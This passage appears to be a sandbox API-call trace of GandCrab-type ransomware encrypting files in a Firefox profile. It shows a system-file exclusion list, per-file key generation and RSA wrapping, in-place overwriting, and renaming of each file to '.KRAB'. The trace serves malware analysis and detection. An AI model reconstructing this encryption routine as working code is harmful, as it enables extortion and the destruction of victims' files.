(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json") returned 112 [0080.305] lstrcmpiW (lpString1="session-state.json", lpString2="desktop.ini") returned 1 [0080.305] lstrcmpiW (lpString1="session-state.json", lpString2="autorun.inf") returned 1 [0080.305] lstrcmpiW (lpString1="session-state.json", lpString2="ntuser.dat") returned 1 [0080.305] lstrcmpiW (lpString1="session-state.json", lpString2="iconcache.db") returned 1 [0080.306] lstrcmpiW (lpString1="session-state.json", lpString2="bootsect.bak") returned 1 [0080.306] lstrcmpiW (lpString1="session-state.json", lpString2="boot.ini") returned 1 [0080.306] lstrcmpiW (lpString1="session-state.json", lpString2="ntuser.dat.log") returned 1 [0080.306] lstrcmpiW (lpString1="session-state.json", lpString2="thumbs.db") returned -1 [0080.306] lstrcmpiW (lpString1="session-state.json", lpString2="KRAB-DECRYPT.html") returned 1 [0080.306] lstrcmpiW (lpString1="session-state.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0080.306] lstrcmpiW (lpString1="session-state.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0080.309] lstrcmpiW (lpString1="session-state.json", lpString2="ntldr") returned 1 [0080.309] lstrcmpiW (lpString1="session-state.json", lpString2="NTDETECT.COM") returned 1 [0080.309] lstrcmpiW (lpString1="session-state.json", lpString2="Bootfont.bin") returned 1 [0080.309] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.310] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x1010b50) returned 1 [0080.311] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.312] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.312] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.312] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x20, pbBuffer=0x338e2cc | out: pbBuffer=0x338e2cc) returned 1 [0080.312] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0080.312] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.312] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x1011788) returned 1 [0080.319] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.321] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.321] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.321] CryptGenRandom (in: hProv=0x1011788, dwLen=0x8, pbBuffer=0x338e2ec | out: pbBuffer=0x338e2ec) returned 1 [0080.321] CryptReleaseContext (hProv=0x1011788, dwFlags=0x0) returned 1 [0080.321] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.322] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1011458) returned 1 [0080.323] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x1023cb8) returned 1 [0080.323] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0080.323] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e25c*=0x100) returned 1 [0080.324] GetLastError () returned 0x0 [0080.324] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.324] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0080.324] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x10111b0) returned 1 [0080.330] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x1023cb8) returned 1 [0080.330] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0080.330] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e25c*=0x100) returned 1 [0080.330] GetLastError () returned 0x0 [0080.330] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.330] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0080.330] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\session-state.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x720 [0080.332] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0080.332] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0080.333] ReadFile (in: hFile=0x720, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e2fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e2fc*=0x87, lpOverlapped=0x0) returned 1 [0080.361] SetFilePointerEx (in: hFile=0x720, liDistanceToMove=0xffffff79, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.361] WriteFile (in: hFile=0x720, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e2f8*=0x87, lpOverlapped=0x0) returned 1 [0080.361] WriteFile (in: hFile=0x720, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e2f8*=0x208, lpOverlapped=0x0) returned 1 [0080.382] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.393] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.394] CloseHandle (hObject=0x720) returned 1 [0080.399] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.400] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\session-state.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\session-state.json.krab")) returned 1 [0080.401] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.401] FindNextFileW (in: hFindFile=0xffea98, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.401] lstrcmpW (lpString1="state.json", lpString2=".") returned 1 [0080.401] lstrcmpW (lpString1="state.json", lpString2="..") returned 1 [0080.401] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="state.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json" [0080.401] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.402] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json.KRAB") returned 109 [0080.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json") returned 104 [0080.402] lstrlenW (lpString=".json") returned 5 [0080.402] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.402] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".json ") returned 6 [0080.402] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json") returned 104 [0080.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json") returned 104 [0080.402] lstrcmpiW (lpString1="state.json", lpString2="desktop.ini") returned 1 [0080.402] lstrcmpiW (lpString1="state.json", lpString2="autorun.inf") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="ntuser.dat") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="iconcache.db") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="bootsect.bak") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="boot.ini") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="ntuser.dat.log") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="thumbs.db") returned -1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="KRAB-DECRYPT.html") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="ntldr") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="NTDETECT.COM") returned 1 [0080.403] lstrcmpiW (lpString1="state.json", lpString2="Bootfont.bin") returned 1 [0080.403] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.403] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x10113d0) returned 1 [0080.405] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.405] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.405] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.406] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338e2cc | out: pbBuffer=0x338e2cc) returned 1 [0080.406] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0080.406] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.406] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x1010820) returned 1 [0080.410] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.411] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.411] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.411] CryptGenRandom (in: hProv=0x1010820, dwLen=0x8, pbBuffer=0x338e2ec | out: pbBuffer=0x338e2ec) returned 1 [0080.411] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0080.411] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.411] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1011700) returned 1 [0080.417] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x1023cb8) returned 1 [0080.417] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0080.417] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e25c*=0x100) returned 1 [0080.418] GetLastError () returned 0x0 [0080.418] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.418] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0080.418] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1010ce8) returned 1 [0080.419] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0x1023cb8) returned 1 [0080.420] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0080.420] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e25c*=0x100) returned 1 [0080.420] GetLastError () returned 0x0 [0080.420] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.420] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0080.420] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\state.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x720 [0080.422] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0080.422] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0080.423] ReadFile (in: hFile=0x720, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e2fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e2fc*=0x33, lpOverlapped=0x0) returned 1 [0080.457] SetFilePointerEx (in: hFile=0x720, liDistanceToMove=0xffffffcd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.457] WriteFile (in: hFile=0x720, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e2f8*=0x33, lpOverlapped=0x0) returned 1 [0080.457] WriteFile (in: hFile=0x720, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e2f8*=0x208, lpOverlapped=0x0) returned 1 [0080.457] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.463] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.464] CloseHandle (hObject=0x720) returned 1 [0080.498] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.499] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\state.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\state.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\state.json.krab")) returned 1 [0080.500] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.500] FindNextFileW (in: hFindFile=0xffea98, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0080.500] FindClose (in: hFindFile=0xffea98 | out: hFindFile=0xffea98) returned 1 [0080.500] CloseHandle (hObject=0x7ec) returned 1 [0080.500] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0080.501] lstrcmpW (lpString1="extensions.ini", lpString2=".") returned 1 [0080.501] lstrcmpW (lpString1="extensions.ini", lpString2="..") returned 1 [0080.501] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="extensions.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini" [0080.501] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.501] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini.KRAB") returned 99 [0080.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini") returned 94 [0080.501] lstrlenW (lpString=".ini") returned 4 [0080.501] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.501] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".ini ") returned 5 [0080.502] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.502] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini") returned 94 [0080.502] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini") returned 94 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="desktop.ini") returned 1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="autorun.inf") returned 1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="ntuser.dat") returned -1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="iconcache.db") returned -1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="bootsect.bak") returned 1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="boot.ini") returned 1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="ntuser.dat.log") returned -1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="thumbs.db") returned -1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="KRAB-DECRYPT.html") returned -1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="CRAB-DECRYPT.txt") returned 1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="ntldr") returned -1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="NTDETECT.COM") returned -1 [0080.502] lstrcmpiW (lpString1="extensions.ini", lpString2="Bootfont.bin") returned 1 [0080.502] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.503] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011898) returned 1 [0080.504] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.504] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.505] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.505] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0080.505] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0080.505] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.505] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10114e0) returned 1 [0080.506] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.507] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.507] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.507] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0080.507] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0080.507] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.507] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011238) returned 1 [0080.509] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023cb8) returned 1 [0080.509] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0080.510] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0080.510] GetLastError () returned 0x0 [0080.510] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.510] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0080.510] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10114e0) returned 1 [0080.511] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023cb8) returned 1 [0080.512] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0080.512] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0080.512] GetLastError () returned 0x0 [0080.512] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.512] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0080.512] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0080.513] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0080.513] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0080.513] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0xb9, lpOverlapped=0x0) returned 1 [0080.525] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.525] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0xb9, lpOverlapped=0x0) returned 1 [0080.526] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0080.527] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.531] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.531] CloseHandle (hObject=0x7ec) returned 1 [0080.532] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.532] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.ini"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\extensions.ini.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\extensions.ini.krab")) returned 1 [0080.535] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.536] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0080.536] lstrcmpW (lpString1="extensions.json", lpString2=".") returned 1 [0080.536] lstrcmpW (lpString1="extensions.json", lpString2="..") returned 1 [0080.536] lstrcatW (in: 